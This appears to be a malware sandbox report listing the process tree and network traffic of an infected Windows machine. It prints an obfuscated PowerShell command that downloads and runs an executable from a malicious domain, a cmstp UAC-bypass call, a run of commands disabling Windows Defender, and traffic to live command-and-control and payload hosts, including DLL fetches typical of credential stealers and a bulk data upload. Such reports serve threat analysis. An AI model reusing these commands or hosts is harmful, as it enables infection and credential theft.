Process (level 8): C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID: 2424

Process (level 9): \??\c:\windows\SysWOW64\cmstp.exe
Command line: "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\rnwabiyd.inf
PID: 2300
Process (level 7): C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID: 4004

Process (level 8): C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"
- Executes dropped EXE
- Windows security modification
PID: 3312

Process (level 9): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" Get-MpPreference -verbose
- Suspicious use of AdjustPrivilegeToken
PID: 2816

Process (level 7): C:\Windows\SysWOW64\cmd.exe
Command line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\mkx.exe"
PID: 4124

Process (level 8): C:\Windows\SysWOW64\timeout.exe
Command line: timeout /T 10 /NOBREAK
- Delays execution with timeout.exe
PID: 2564
Process (level 3): C:\Windows\SysWOW64\mshta.exe
Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
- Suspicious use of WriteProcessMemory
PID: 584

Process (level 4): C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 3712
Process (level 1): C:\Windows\SysWOW64\DllHost.exe
Command line: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
PID: 5108

Process (level 2): C:\Windows\SysWOW64\cmd.exe
Command line: cmd /c start C:\Windows\temp\vokybpfg.exe
PID: 4136

Process (level 3): C:\Windows\temp\vokybpfg.exe
Command line: C:\Windows\temp\vokybpfg.exe
- Executes dropped EXE
PID: 4924

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" Get-MpPreference -verbose
- Suspicious use of AdjustPrivilegeToken
PID: 4780
Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
- Suspicious use of AdjustPrivilegeToken
PID: 4580

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
- Suspicious use of AdjustPrivilegeToken
PID: 4876

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
- Suspicious use of AdjustPrivilegeToken
PID: 4340

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
- Suspicious use of AdjustPrivilegeToken
PID: 2480

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
- Suspicious use of AdjustPrivilegeToken
PID: 488

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
- Suspicious use of AdjustPrivilegeToken
PID: 508

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
- Suspicious use of AdjustPrivilegeToken
PID: 568

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
- Suspicious use of AdjustPrivilegeToken
PID: 4208

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
- Suspicious use of AdjustPrivilegeToken
PID: 4660

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
- Suspicious use of AdjustPrivilegeToken
PID: 3044

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
- Suspicious use of AdjustPrivilegeToken
PID: 3948

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
- Suspicious use of AdjustPrivilegeToken
PID: 4980
Process (level 2): C:\Windows\SysWOW64\taskkill.exe
Command line: taskkill /IM cmstp.exe /F
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID: 956

Process (level 2): C:\Windows\SysWOW64\cmd.exe
Command line: cmd /c start C:\Windows\temp\wmimpxhi.exe
PID: 2976

Process (level 3): C:\Windows\temp\wmimpxhi.exe
Command line: C:\Windows\temp\wmimpxhi.exe
- Executes dropped EXE
PID: 6092

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell" Get-MpPreference -verbose
PID: 2664

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
PID: 960

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
PID: 4320

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
PID: 4616

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
PID: 2128

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
PID: 5916

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
PID: 5624

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
PID: 5876

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
PID: 2420

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
PID: 6140

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
PID: 3724

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
PID: 3984

Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
PID: 4384

Process (level 2): C:\Windows\SysWOW64\taskkill.exe
Command line: taskkill /IM cmstp.exe /F
- Kills process with taskkill
PID: 4560
Process (level 1): C:\Windows\SysWOW64\werfault.exe
Command line: werfault.exe /h /shared Global\d3ddde34bd2148579399e0ec6b9aecac /t 416 /p 504
PID: 5884

Process (level 1): C:\Windows\system32\werfault.exe
Command line: werfault.exe /h /shared Global\a5dd4706d9064727a4d6b934f7cb734a /t 2972 /p 2968
PID: 5984

Process (level 1): C:\Windows\explorer.exe
Command line: explorer.exe
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID: 6088

Process (level 1): C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
Command line: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
- Suspicious use of SetWindowsHookEx
PID: 2240

Process (level 1): C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
Command line: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
- Suspicious use of SetWindowsHookEx
PID: 5800

Process (level 1): C:\Windows\System32\RuntimeBroker.exe
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
PID: 5668

Process (level 1): C:\Windows\System32\RuntimeBroker.exe
Command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
PID: 4104

Process (level 1): C:\Windows\system32\werfault.exe
Command line: werfault.exe /h /shared Global\b1819abdb2684d88930136de7e580d56 /t 2328 /p 5800
PID: 5460

Process (level 1): C:\Windows\system32\werfault.exe
Command line: werfault.exe /h /shared Global\79b9954a1bc942248a851d20a38d1381 /t 2720 /p 2240
PID: 4640

Process (level 1): C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
Command line: "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID: 356
Network
Remote address: 8.8.8.8:53
Request: bit.do IN A
Response: bit.do IN A 54.83.52.76

Remote address: 8.8.8.8:53
Request: pdshcjvnv.ug IN A
Response:

Remote address: 8.8.8.8:53
Request: rbcxvnb.ug IN A
Response:

Remote address: 8.8.8.8:53
Request: agentpurple.ac.ug IN A
Response:

Remote address: 8.8.8.8:53
Request: zxvbcrt.ug IN A
Response:

Remote address: 54.83.52.76:80
Request: GET /fqhJD HTTP/1.1
Host: bit.do
Connection: Keep-Alive
Response: HTTP/1.1 301 Moved Permanently
Date: Wed, 18 Nov 2020 13:43:50 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 308
Connection: keep-alive
Location: http://agentt.ac.ug/zxcv.EXE

Remote address: 54.83.52.76:80
Request: GET /fqhHT HTTP/1.1
Host: bit.do
Connection: Keep-Alive
Response: HTTP/1.1 301 Moved Permanently
Date: Wed, 18 Nov 2020 13:43:50 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 306
Connection: keep-alive
Location: http://nicolas.ug/zxcv.EXE

Remote address: 54.83.52.76:80
Request: GET /fqhJv HTTP/1.1
Host: bit.do
Connection: Keep-Alive
Response: HTTP/1.1 301 Moved Permanently
Date: Wed, 18 Nov 2020 13:43:50 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 316
Connection: keep-alive
Location: http://courtneyjones.ac.ug/zxcvb.exe

Remote address: 8.8.8.8:53
Request: agentt.ac.ug IN A
Response: agentt.ac.ug IN A 217.8.117.77

Remote address: 8.8.8.8:53
Request: courtneyjones.ac.ug IN A
Response: courtneyjones.ac.ug IN A 217.8.117.77

Remote address: 8.8.8.8:53
Request: nicolas.ug IN A
Response: nicolas.ug IN A 217.8.117.77

Remote address: 217.8.117.77:80
Request: GET /zxcv.EXE HTTP/1.1
Host: agentt.ac.ug
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:29 GMT
ETag: "149000-5b3c379edbb12"
Accept-Ranges: bytes
Content-Length: 1347584
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

Remote address: 217.8.117.77:80
Request: GET /zxcv.EXE HTTP/1.1
Host: nicolas.ug
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:29 GMT
ETag: "149000-5b3c379edbb12"
Accept-Ranges: bytes
Content-Length: 1347584
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

Remote address: 217.8.117.77:80
Request: GET /zxcvb.exe HTTP/1.1
Host: courtneyjones.ac.ug
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Tue, 10 Nov 2020 16:50:26 GMT
ETag: "11e600-5b3c379c835ab"
Accept-Ranges: bytes
Content-Length: 1172992
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream

Remote address: 8.8.8.8:53
Request: telete.in IN A
Response: telete.in IN A 195.201.225.248

Remote address: 195.201.225.248:443
Request: GET /brikitiki HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: telete.in
Response: HTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 13:43:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=26f50a0e652318303c_11806780713615765570; expires=Thu, 19 Nov 2020 13:43:57 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=35768000

Remote address: 8.8.8.8:53
Request: puffpuff423.top IN A
Response: puffpuff423.top IN A 104.27.132.115
Response: puffpuff423.top IN A 104.27.133.115
Response: puffpuff423.top IN A 172.67.197.203

Remote address: 104.27.132.115:443
Request: POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: puffpuff423.top
Response: HTTP/1.1 200 OK
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d961db2b00896b64654aa02763ce6303f1605707037; expires=Fri, 18-Dec-20 13:43:57 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 067d32130400000bfd3e22c000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=AVI1Y9u1uC7X5vKN%2Fz4%2BU0ls843ISwsrFQ%2BjEKTssUm0INfTjnl%2BW9VaUOSeMlaxkznjf73gqlqQq2B6zppENwEvVoSlwE0807w%2BV82AqWk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f421f980acc0bfd-AMS

GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/bcbf9f6936f09f7df8ccdf9dc95fc3b52a1eda94 mkx.exe
Remote address: 104.27.132.115:443
Request: GET //l/f/O_l-uHUB4qmE47arxwQ9/bcbf9f6936f09f7df8ccdf9dc95fc3b52a1eda94 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: puffpuff423.top
Response: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Set-Cookie: __cfduid=d961db2b00896b64654aa02763ce6303f1605707037; expires=Fri, 18-Dec-20 13:43:57 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Last-Modified: Mon, 19 Oct 2020 16:29:48 GMT
ETag: "5f8dbefc-dfcff"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 067d32150a00000bfd35250000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tiTohd66eO03xBuMn%2Fcwo4stXWXxNlVl%2BG83PNO6Rruh6Tu%2FCvt8Bh3uhrYCYyeGqZkVU16A4VUQHscjuUz3%2BEyPZTVrhTjJXpM7sbQb6Xk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f421f9b4bd40bfd-AMS

GET https://puffpuff423.top//l/f/O_l-uHUB4qmE47arxwQ9/40379fe9d51fb061375f46f04a94c950dfbe51d2 mkx.exe
Remote address: 104.27.132.115:443
Request: GET //l/f/O_l-uHUB4qmE47arxwQ9/40379fe9d51fb061375f46f04a94c950dfbe51d2 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: puffpuff423.top
Response: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 2828315
Connection: keep-alive
Set-Cookie: __cfduid=d931992b99da4bd28e8ddddbd72b3df3c1605707039; expires=Fri, 18-Dec-20 13:43:59 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Last-Modified: Mon, 19 Oct 2020 16:29:48 GMT
ETag: "5f8dbefc-2b281b"
Accept-Ranges: bytes
CF-Cache-Status: DYNAMIC
cf-request-id: 067d321ba600000bfdf2215000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=sO29puUVeLtaFSMWZyibj0jDGg1M0sG8PH7fW86CWvlnvBvtOiPAbenHvCldrghiYnz8lhGcGoH9jY5bvXxKCquerMl%2Fp%2F3zTUA1dirVmAg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f421fa5d9790bfd-AMS

Remote address: 104.27.132.115:443
Request: POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=fQ2iY0qI4sL4iB1dG6aM1wQ5vV6a
Content-Length: 593236
Host: puffpuff423.top
Response: HTTP/1.1 200 OK
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d09627d8867e54ba2e922b58a2bb807011605707041; expires=Fri, 18-Dec-20 13:44:01 GMT; path=/; domain=.puffpuff423.top; HttpOnly; SameSite=Lax
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 067d32227e00000bfdf1863000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cxFVeS4rgNvlSSbbGDqkJUuG2%2BVeDSwi2revzLhpiTWqnfNTlshEgsIrNaL2WTo36ExCKJU87d9xbfP%2FjSrDycSrvDGG362i4EhC1rcJiIc%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 5f421fb0cfeb0bfd-AMS
-
Remote address: 8.8.8.8:53
Request
morasergiov.ac.ug IN A
Response
morasergiov.ac.ug IN A 217.8.117.77
-
Remote address: 8.8.8.8:53
Request
jamesrlongacre.ug IN A
Response
jamesrlongacre.ug IN A 217.8.117.77
-
Remote address: 217.8.117.77:80
Request
POST /index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: jamesrlongacre.ug
Content-Length: 101
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Transfer-Encoding: chunked
Content-Type: text/html
-
Remote address: 217.8.117.77:80
Request
POST /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:52 GMT
ETag: "235d0-58a9fc6206c00"
Accept-Ranges: bytes
Content-Length: 144848
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /sqlite3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Sun, 06 Aug 2017 19:52:20 GMT
ETag: "9d9d8-5561b116cc500"
Accept-Ranges: bytes
Content-Length: 645592
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:00:58 GMT
ETag: "519d0-58a9fc2e87280"
Accept-Ranges: bytes
Content-Length: 334288
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:20 GMT
ETag: "217d0-58a9fc4382400"
Accept-Ranges: bytes
Content-Length: 137168
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:30 GMT
ETag: "6b738-58a9fc4d0ba80"
Accept-Ranges: bytes
Content-Length: 440120
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: Thu, 06 Jun 2019 04:01:44 GMT
ETag: "1303d0-58a9fc5a65a00"
Accept-Ranges: bytes
Content-Length: 1246160
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: application/octet-stream
-
Remote address: 217.8.117.77:80
Request
POST /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: morasergiov.ac.ug
Connection: Keep-Alive
Cache-Control: no-cache
Response
HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
